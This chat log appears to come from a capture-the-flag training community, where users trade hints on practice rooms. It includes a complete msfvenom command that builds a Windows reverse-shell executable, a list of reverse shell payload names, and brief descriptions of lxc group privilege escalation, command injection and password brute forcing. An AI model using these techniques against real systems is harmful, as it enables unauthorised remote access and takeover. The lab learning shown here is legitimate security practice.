If you are working on a Windows machine and are using Metasploit, it is currently defaulting to reverse_https payloads, which will likely not work. Please set your payload manually for the time being to one of the following:
windows/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp
windows/shell/reverse_tcp
If one of these does not work, we will be glad to help assist further.
does metasploit have any more help than the --help command? been looking for a while for [What option sets the architecture to be exploited?] but can't find anything about architecture.
ofc checked google as well
typing background ?
Hello y'all hope everyone is doing well. Have a question about Post-Exploitation Basics: Task2, #3, I have a hidden file in users. dir -force does not show a hidden file except desktop.ini
dont want answer just guidance
ctrl+z kills the session :-(
@rich gust no it doesn't. It pushes it to background. you can use sessions <id> to get back that session. also from linux perspective u can type fg to get that program.
@dull palm why do you assume that it's a file
i dont assume ever, but dir -force searches for hidden files/ folders yes?
don't know never used it. reread the question
GAH!!! So close >.<
Did you set up a listener @rich gust
It'll still throw that error
But you should get a reverse shell
Can you share in spoiler brackets what the msfvenom payload you used is?
||msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.1.62 LPORT=5555 -f exe -o Advanced.exe||
If you're trying to connect via netcat, a Meterpreter shell isn't going to work.
You need to use a ||windows/shell/reverse_tcp|| shell
That explains how you got a connection back, but crashed right away.
I see
oof... lol now it's saying The specified service does not exist as an installed service. and the netcat listener still connects but drops right away
im going to start back with a fresh machine to make sure I'm doing this right
... got it!
Glad we got that sorted out for you.
||windows/shell_reverse_tcp|| is what I needed... instead of '_' I had '/' in the first position
Nice!
It's the little things that get you.
Always
Disregard, I found it
Nice one! Congrats.
@patent token I like how your writeup provides just enough detail to make the reader think about what they're doing.
nvm
FINALLY finished yotf. Thanks to the write up giving me a push in the right direction to figure out the web portion. Took me almost a day after that to beat the rest of the box. Thanks @inland onyx for the great box. Learned some new tricks
I am interested in the unintended route that was patched... now that there is a writeup will you share it?
in yotf writeup why is there a '\' (backslash) at the start and end of the command injection..
target : ""; something echo""
and why this echo..
\
hmmm what writeup are you referring to? muirland hasn't released yet?
Nvm
he did
it is released
i had to wrap my injection in || `backticks` ||@indigo ridge, maybe the \ is just a typo from trying to escape them
The unintended route was to use lxc @white salmon, originally the fox user was in the lxc group and it meant you could import a container where you have root privs and mount the host filesystem in it
understand all ... you could have just said lxc
one of my favorite paths to root!
and you could have just said thanks for the answer @white salmon
Fair play
Can someone help with cve-2019-9053 exploit? I am trying to do simple CTF room but stuck with the exploit.
Actually, I am stuck with python errors of this exploit. Can i post a ss of errors i am facing? or can I DM you?
put them as spoilers, but sure to either
@white salmon also smbpasswd
thanks Legndery... didn't even think to check to abuse that
Thanks @oblique cliff
@echo thunder what's the question?
When I try to get reverse shell with socat the shell does not come back
it seems that the terminal is freezing
try asking this in #room-help - you need more than a hint
hey I'm stuck on binexp room on binary 2, anyone solved it?
hey guys, any idea how to play an mp3 file via terminal?
@tardy python what exactly is your question?
@worthy iris no need to play it in your terminal
the payload is not working for me, maybe I missed something
@oblique cliff ok I'll keep looking
Nothing to look for. Just get it onto your host OS and play it there
o
Oh sorry. You do have to play the file. I just meant you don't strictly have to do it in your terminal. Just playing it regularly is fine
can you check my script pretty quick ? can i dm you? @oblique cliff
No I wanna play bass. You can put it here and I'll answer when I'm done or someone else can if they're available
ty bob
Three letter technical term abbreviation for a WiFi password ?
Nvm, just had to Google HARDER
How dost one open/view a file in an smb server
@granite pelican normally you'd download the file from the smb server
Ok so I'm in the Network Services room. I'm in the profiles share and 4-4 says 'look around, who's profile dis'
Is there something I'm supposed to get from the files listed? If I can't open them?
can you see who owns them?
No. There's D, DH, and H next to them, unsure about that
I haven't done that room but are there multiple directories?
Even if you can't open the file, you enumerate the directories and files within and it might give you a clue
If D stands for directory, what does DH and H stand for
I have no idea what you're looking at. are you running ls or something to view it?
Yeah ls.
For ex .cache is DH
.profile is H
.ssh is DH
And I can cd into .ssh
Well keep poking around at it. Sounds like you're close and maybe someone who has done that room might be able to help if you're still stuck
I need some hint for the room CCT2019
i have ||extracted archive.zip from the image but cant figure out the passwd||
[Task 3] CCT-2019 for1
@glacial mantle you awake?
Yes
@glacial mantle oh sorry, I thought you were stuck at the first zipfile, not archive.zip
just got there
@glacial mantle will do, trying to figure it out myself atm.
thanks
Looking for some hints for OWASP Juice Shop Broken Authentication task. I've looked thru all the reviews, found the ftp directory, but still haven't found more info on Jim. Was thinking about using a hydra/Burp name list. Same with administrator password, was thinking about using hydra. Am I on the right path?
Thank you in advance!
@glacial mantle i'm stuck as hell. gimme a dm if you find the solution
lol same!!
I keep coming back to the enigma machine, but I can't find any cipher text that fits it, so I guess that's a later step
Yeah the given image is of a 4 rotor enigma machine
no idea how to find the passphrase for the archive.zip though, been hitting my head against the wall for the last 30 minutes or so
lmao
anyway, sleep time. good luck
i am taking a break too, same to you!
In the future it will help immensely for you to use the screenshot tool instead of cell phone pictures.
You can open Discord in a browser.
Can do
@exotic rose the administrator password is very weak, you can either brute force or guess it
Please, take a screenshot of your screen.
Or describe your issue, I can not read those.
Okay
Oh, wait.
Yeah.. I'm on a KALI virtual machine and trying to exploit the metasploit box. In task 5, we have to get the session by using the icecast exploit. But every time the session fails with an error REX::BindFailed The address is already in use or unavailable.